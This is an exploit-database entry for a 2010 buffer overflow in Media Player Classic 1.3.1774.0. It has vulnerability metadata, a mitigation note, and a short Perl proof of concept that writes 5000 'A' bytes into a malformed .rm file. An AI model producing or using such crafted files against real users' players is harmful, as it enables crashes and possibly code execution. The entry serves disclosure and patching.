Media Player Classic - v 1.3.1774.0 (.rm file) buffer Overflow poc

vendor:

Media Player Classic

by:

sniper ip

7,8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Media Player Classic

Affected Version From: 1.3.1774.0

Affected Version To: 1.3.1774.0

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP2, Windows XP3, Windows 7

2010

Media Player Classic – v 1.3.1774.0 (.rm file) buffer Overflow poc

A buffer overflow vulnerability exists in Media Player Classic version 1.3.1774.0 when processing .rm files. An attacker can exploit this vulnerability by creating a malicious .rm file and convincing a user to open it with Media Player Classic, resulting in arbitrary code execution.

Mitigation:

Upgrade to the latest version of Media Player Classic.

Source

Exploit-DB raw data:

# Exploit Title: [ Media Player Classic - v 1.3.1774.0  (.rm file)  buffer Overflow poc ]
# Date: [ 2010-05-22 ]
# Author: [ sniper ip ]
# Software Link: []
# Version: [ v 1.3.1774.0  ]
# Tested on: [ Windows  xp2 , Windows  xp3 , Windows  7 ]
# CVE : [if exists]
# Code : [

#!/usr/bin/perl
# |--------------------------------------------------------------------------------------------------| #
# | -- Media Player Classic - v 1.3.1774.0   (.rm file)  buffer Overflow poc --| #
# | ---------- -- By : sniper ip # My Email : sniper-ip@hotmail.com ------------- | #
# |--------------------------------------------------------------------------------------------------| #

$buff="A" x 5000;
open (myfile , ">>sniper.rm");
print myfile $buff;
close (myfile);